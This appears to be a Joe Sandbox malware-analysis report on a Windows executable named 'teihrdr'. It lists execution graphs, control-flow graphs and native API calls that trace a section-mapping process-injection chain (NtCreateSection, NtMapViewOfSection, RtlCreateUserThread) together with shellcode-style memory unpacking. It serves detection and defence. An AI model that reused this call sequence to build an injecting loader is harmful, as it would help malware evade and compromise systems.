                                          Execution Graph

                                          Execution Coverage:7.8%
                                          Dynamic/Decrypted Code Coverage:42.6%
                                          Signature Coverage:0%
                                          Total number of Nodes:122
                                          Total number of Limit Nodes:4
                                          execution_graph 3475 402e40 3477 402e37 3475->3477 3478 402edf 3477->3478 3479 4018e6 3477->3479 3480 4018f5 3479->3480 3481 40192e Sleep 3480->3481 3482 401949 3481->3482 3484 40195a 3482->3484 3485 401514 3482->3485 3484->3478 3486 401524 3485->3486 3487 4015c4 NtDuplicateObject 3486->3487 3496 4016e0 3486->3496 3488 4015e1 NtCreateSection 3487->3488 3487->3496 3489 401661 NtCreateSection 3488->3489 3490 401607 NtMapViewOfSection 3488->3490 3492 40168d 3489->3492 3489->3496 3490->3489 3491 40162a NtMapViewOfSection 3490->3491 3491->3489 3493 401648 3491->3493 3494 401697 NtMapViewOfSection 3492->3494 3492->3496 3493->3489 3495 4016be NtMapViewOfSection 3494->3495 3494->3496 3495->3496 3496->3484 3539 600001 3540 600005 3539->3540 3545 60092b GetPEB 3540->3545 3542 600030 3547 60003c 3542->3547 3546 600972 3545->3546 3546->3542 3548 600049 3547->3548 3549 600e0f 2 API calls 3548->3549 3550 600223 3549->3550 3551 600d90 GetPEB 3550->3551 3552 600238 VirtualAlloc 3551->3552 3553 600265 3552->3553 3554 6002ce VirtualProtect 3553->3554 3556 60030b 3554->3556 3555 600439 VirtualFree 3559 6004be LoadLibraryA 3555->3559 3556->3555 3558 6008c7 3559->3558 3592 401542 3593 40153b 3592->3593 3594 4015c4 NtDuplicateObject 3593->3594 3603 4016e0 3593->3603 3595 4015e1 NtCreateSection 3594->3595 3594->3603 3596 401661 NtCreateSection 3595->3596 3597 401607 NtMapViewOfSection 3595->3597 3599 40168d 3596->3599 3596->3603 3597->3596 3598 40162a NtMapViewOfSection 3597->3598 3598->3596 3600 401648 3598->3600 3601 401697 NtMapViewOfSection 3599->3601 3599->3603 3600->3596 3602 4016be NtMapViewOfSection 3601->3602 3601->3603 3602->3603 3560 600005 3561 60092b GetPEB 3560->3561 3562 600030 3561->3562 3563 60003c 7 API calls 3562->3563 3564 600038 3563->3564 3651 69f1ec 3652 69f1f8 3651->3652 3653 69f998 3 API calls 3652->3653 3654 69f210 3653->3654 3655 402dd0 3656 402ddc 3655->3656 3657 402edf 3656->3657 3658 4018e6 8 API calls 3656->3658 3658->3657 3497 69f1f8 3498 69f207 3497->3498 3501 69f998 3498->3501 3503 69f9b3 3501->3503 3502 69f9bc CreateToolhelp32Snapshot 3502->3503 3504 69f9d8 Module32First 3502->3504 3503->3502 3503->3504 3505 69f9e7 3504->3505 3507 69f210 3504->3507 3508 69f657 3505->3508 3509 69f682 3508->3509 3510 69f6cb 3509->3510 3511 69f693 VirtualAlloc 3509->3511 3510->3510 3511->3510 3573 4018f1 3574 4018f6 3573->3574 3575 40192e Sleep 3574->3575 3576 401949 3575->3576 3577 401514 7 API calls 3576->3577 3578 40195a 3576->3578 3577->3578 3638 401915 3639 4018c6 3638->3639 3640 40191a 3638->3640 3641 40192e Sleep 3640->3641 3642 401949 3641->3642 3643 401514 7 API calls 3642->3643 3644 40195a 3642->3644 3643->3644 3512 402f97 3513 4030ee 3512->3513 3514 402fc1 3512->3514 3514->3513 3515 40307c RtlCreateUserThread NtTerminateProcess 3514->3515 3515->3513 3628 402d7b 3631 402d38 3628->3631 3629 402dc7 3630 4018e6 8 API calls 3630->3629 3631->3628 3631->3629 3631->3630 3516 60003c 3517 600049 3516->3517 3529 600e0f SetErrorMode SetErrorMode 3517->3529 3522 600265 3523 6002ce VirtualProtect 3522->3523 3525 60030b 3523->3525 3524 600439 VirtualFree 3528 6004be LoadLibraryA 3524->3528 3525->3524 3527 6008c7 3528->3527 3530 600223 3529->3530 3531 600d90 3530->3531 3532 600dad 3531->3532 3533 600dbb GetPEB 3532->3533 3534 600238 VirtualAlloc 3532->3534 3533->3534 3534->3522 3579 4014fe 3580 401506 3579->3580 3581 401531 3579->3581 3582 4015c4 NtDuplicateObject 3581->3582 3591 4016e0 3581->3591 3583 4015e1 NtCreateSection 3582->3583 3582->3591 3584 401661 NtCreateSection 3583->3584 3585 401607 NtMapViewOfSection 3583->3585 3587 40168d 3584->3587 3584->3591 3585->3584 3586 40162a NtMapViewOfSection 3585->3586 3586->3584 3588 401648 3586->3588 3589 401697 NtMapViewOfSection 3587->3589 3587->3591 3588->3584 3590 4016be NtMapViewOfSection 3589->3590 3589->3591 3590->3591

                                          Executed Functions

                                          Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 111 4018c5 104->111 112 4018bc-4018e3 call 401193 104->112 105->106 115 4015c4-4015db NtDuplicateObject 105->115 106->104 111->112 115->106 116 4015e1-401605 NtCreateSection 115->116 118 401661-401687 NtCreateSection 116->118 119 401607-401628 NtMapViewOfSection 116->119 118->106 123 40168d-401691 118->123 119->118 122 40162a-401646 NtMapViewOfSection 119->122 122->118 125 401648-40165e 122->125 123->106 126 401697-4016b8 NtMapViewOfSection 123->126 125->118 126->106 128 4016be-4016da NtMapViewOfSection 126->128 128->106 130 4016e0 call 4016e5 128->130
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                          • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                          Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 158 4018c5 151->158 159 4018bc-4018e3 call 401193 151->159 152->153 162 4015c4-4015db NtDuplicateObject 152->162 153->151 158->159 162->153 163 4015e1-401605 NtCreateSection 162->163 165 401661-401687 NtCreateSection 163->165 166 401607-401628 NtMapViewOfSection 163->166 165->153 170 40168d-401691 165->170 166->165 169 40162a-401646 NtMapViewOfSection 166->169 169->165 172 401648-40165e 169->172 170->153 173 401697-4016b8 NtMapViewOfSection 170->173 172->165 173->153 175 4016be-4016da NtMapViewOfSection 173->175 175->153 177 4016e0 call 4016e5 175->177
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectView
                                          • String ID:
                                          • API String ID: 1652636561-0
                                          • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                          • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                          Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 202 4018c5 195->202 203 4018bc-4018e3 call 401193 195->203 196->197 206 4015c4-4015db NtDuplicateObject 196->206 197->195 202->203 206->197 207 4015e1-401605 NtCreateSection 206->207 209 401661-401687 NtCreateSection 207->209 210 401607-401628 NtMapViewOfSection 207->210 209->197 214 40168d-401691 209->214 210->209 213 40162a-401646 NtMapViewOfSection 210->213 213->209 216 401648-40165e 213->216 214->197 217 401697-4016b8 NtMapViewOfSection 214->217 216->209 217->197 219 4016be-4016da NtMapViewOfSection 217->219 219->197 221 4016e0 call 4016e5 219->221
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                          • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                          Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 241 4018c5 234->241 242 4018bc-4018e3 call 401193 234->242 235->236 245 4015c4-4015db NtDuplicateObject 235->245 236->234 241->242 245->236 246 4015e1-401605 NtCreateSection 245->246 248 401661-401687 NtCreateSection 246->248 249 401607-401628 NtMapViewOfSection 246->249 248->236 253 40168d-401691 248->253 249->248 252 40162a-401646 NtMapViewOfSection 249->252 252->248 255 401648-40165e 252->255 253->236 256 401697-4016b8 NtMapViewOfSection 253->256 255->248 256->236 258 4016be-4016da NtMapViewOfSection 256->258 258->236 260 4016e0 call 4016e5 258->260
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                          • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                          Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 281 4018c5 274->281 282 4018bc-4018e3 call 401193 274->282 275->276 285 4015c4-4015db NtDuplicateObject 275->285 276->274 281->282 285->276 286 4015e1-401605 NtCreateSection 285->286 288 401661-401687 NtCreateSection 286->288 289 401607-401628 NtMapViewOfSection 286->289 288->276 293 40168d-401691 288->293 289->288 292 40162a-401646 NtMapViewOfSection 289->292 292->288 295 401648-40165e 292->295 293->276 296 401697-4016b8 NtMapViewOfSection 293->296 295->288 296->276 298 4016be-4016da NtMapViewOfSection 296->298 298->276 300 4016e0 call 4016e5 298->300
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                          • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                          Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                          Function 0060003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 60003c-600047 1 600049 0->1 2 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 0->2 1->2 17 600265-600289 call 600a69 2->17 18 60028b-600292 2->18 23 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 17->23 20 6002a1-6002b0 18->20 22 6002b2-6002cc 20->22 20->23 22->20 29 6003d1-6003e0 23->29 30 6003e2-600437 call 600ce7 29->30 31 600439-6004b8 VirtualFree 29->31 30->29 33 6005f4-6005fe 31->33 34 6004be-6004cd 31->34 35 600604-60060d 33->35 36 60077f-600789 33->36 38 6004d3-6004dd 34->38 35->36 39 600613-600637 35->39 42 6007a6-6007b0 36->42 43 60078b-6007a3 36->43 38->33 41 6004e3-600505 38->41 46 60063e-600648 39->46 50 600517-600520 41->50 51 600507-600515 41->51 44 6007b6-6007cb 42->44 45 60086e-6008be LoadLibraryA 42->45 43->42 47 6007d2-6007d5 44->47 55 6008c7-6008f9 45->55 46->36 48 60064e-60065a 46->48 52 600824-600833 47->52 53 6007d7-6007e0 47->53 48->36 54 600660-60066a 48->54 56 600526-600547 50->56 51->56 60 600839-60083c 52->60 57 6007e2 53->57 58 6007e4-600822 53->58 59 60067a-600689 54->59 61 600902-60091d 55->61 62 6008fb-600901 55->62 63 60054d-600550 56->63 57->52 58->47 64 600750-60077a 59->64 65 60068f-6006b2 59->65 60->45 66 60083e-600847 60->66 62->61 68 6005e0-6005ef 63->68 69 600556-60056b 63->69 64->46 70 6006b4-6006ed 65->70 71 6006ef-6006fc 65->71 72 600849 66->72 73 60084b-60086c 66->73 68->38 74 60056d 69->74 75 60056f-60057a 69->75 70->71 76 60074b 71->76 77 6006fe-600748 71->77 72->45 73->60 74->68 78 60059b-6005bb 75->78 79 60057c-600599 75->79 76->59 77->76 84 6005bd-6005db 78->84 79->84 84->63
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_600000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14
                                          Function 0069F998 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 69f998-69f9b1 320 69f9b3-69f9b5 319->320 321 69f9bc-69f9c8 CreateToolhelp32Snapshot 320->321 322 69f9b7 320->322 323 69f9d8-69f9e5 Module32First 321->323 324 69f9ca-69f9d0 321->324 322->321 325 69f9ee-69f9f6 323->325 326 69f9e7-69f9e8 call 69f657 323->326 324->323 331 69f9d2-69f9d6 324->331 329 69f9ed 326->329 329->325 331->320 331->323
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0069F9C0
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0069F9E0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_68d000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 79f59a5d47273e85865966b3a865d013e98ee0cfb98cb835860f945f175fe23d
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: 6CF0F6321007147BDB203BF8A88DBAE76EDAF48325F11053AF642D19C0DB70EC058660
                                          Function 00600E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 600e0f-600e24 SetErrorMode * 2 333 600e26 332->333 334 600e2b-600e2c 332->334 333->334
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_600000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5
                                          Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                          • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                          • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                          Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                          • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                          • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                          Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
